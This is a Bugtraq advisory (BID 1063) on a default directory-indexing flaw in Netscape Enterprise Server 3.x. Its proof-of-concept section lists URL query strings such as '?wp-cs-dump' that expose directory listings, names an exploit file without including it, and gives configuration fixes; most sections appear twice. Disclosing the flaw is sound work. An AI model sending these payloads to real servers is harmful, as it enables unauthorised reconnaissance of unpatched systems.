Netscape Enterprise Server Directory Indexing Vulnerability
BID:1063
Info
Netscape Enterprise Server Directory Indexing Vulnerability
| Bugtraq ID: | 1063 |
| Class: | Configuration Error |
| CVE: | |
| Remote: | Yes |
| Local: | Yes |
| Published: | Mar 17 2000 12:00AM |
| Updated: | Mar 17 2000 12:00AM |
| Credit: | Posted to Bugtraq on March 17, 2000 by Vanja Hrustic <[email protected]>. |
| Vulnerable: |
Netscape Enterprise Server 3.51 Netscape Enterprise Server 3.6 Netscape Enterprise Server 3.0 |
| Not Vulnerable: | |
Discussion
Netscape Enterprise Server Directory Indexing Vulnerability
Netscape Enterprise Server 3.x includes a poorly documented feature that will allow remote users to view directory listings by appending various instructional tags to the URL. Although it can be disabled, Netscape Enterprise Server is shipped with the "Directory Indexing" feature enabled by default.
Netscape Enterprise Server 3.x includes a poorly documented feature that will allow remote users to view directory listings by appending various instructional tags to the URL. Although it can be disabled, Netscape Enterprise Server is shipped with the "Directory Indexing" feature enabled by default.
Exploit / POC
Netscape Enterprise Server Directory Indexing Vulnerability
http://target/?wp-cs-dump
?wp-cs-dump can be substituted with the following strings in order to achieve the same results:
?wp-ver-info
?wp-html-rend
?wp-usr-prop
?wp-ver-diff
?wp-verify-link
?wp-start-ver
?wp-stop-ver
?wp-uncheckout
Gabriel Maggiotti <[email protected]> has provided the following exploit:
netscape-server.c
http://target/?wp-cs-dump
?wp-cs-dump can be substituted with the following strings in order to achieve the same results:
?wp-ver-info
?wp-html-rend
?wp-usr-prop
?wp-ver-diff
?wp-verify-link
?wp-start-ver
?wp-stop-ver
?wp-uncheckout
Gabriel Maggiotti <[email protected]> has provided the following exploit:
netscape-server.c
Solution / Fix
Netscape Enterprise Server Directory Indexing Vulnerability
Solution:
The Directory Indexing feature can be turned off via the Administration Interface. Selecting Content Management -> Document Preferences and changing Directory Indexing to "none" will disable this feature.
Also, manually editing the file obj.conf will do the same. Conduct a search for the following:
Service method="(GET|HEAD)" type="magnus-internal/directory"
fn="index-common"
and replace fn="index-common" with fn="send-error".
Solution:
The Directory Indexing feature can be turned off via the Administration Interface. Selecting Content Management -> Document Preferences and changing Directory Indexing to "none" will disable this feature.
Also, manually editing the file obj.conf will do the same. Conduct a search for the following:
Service method="(GET|HEAD)" type="magnus-internal/directory"
fn="index-common"
and replace fn="index-common" with fn="send-error".
References
Netscape Enterprise Server Directory Indexing Vulnerability
References:
References:
- Netscape Enterprise Server Homepage (Netscape)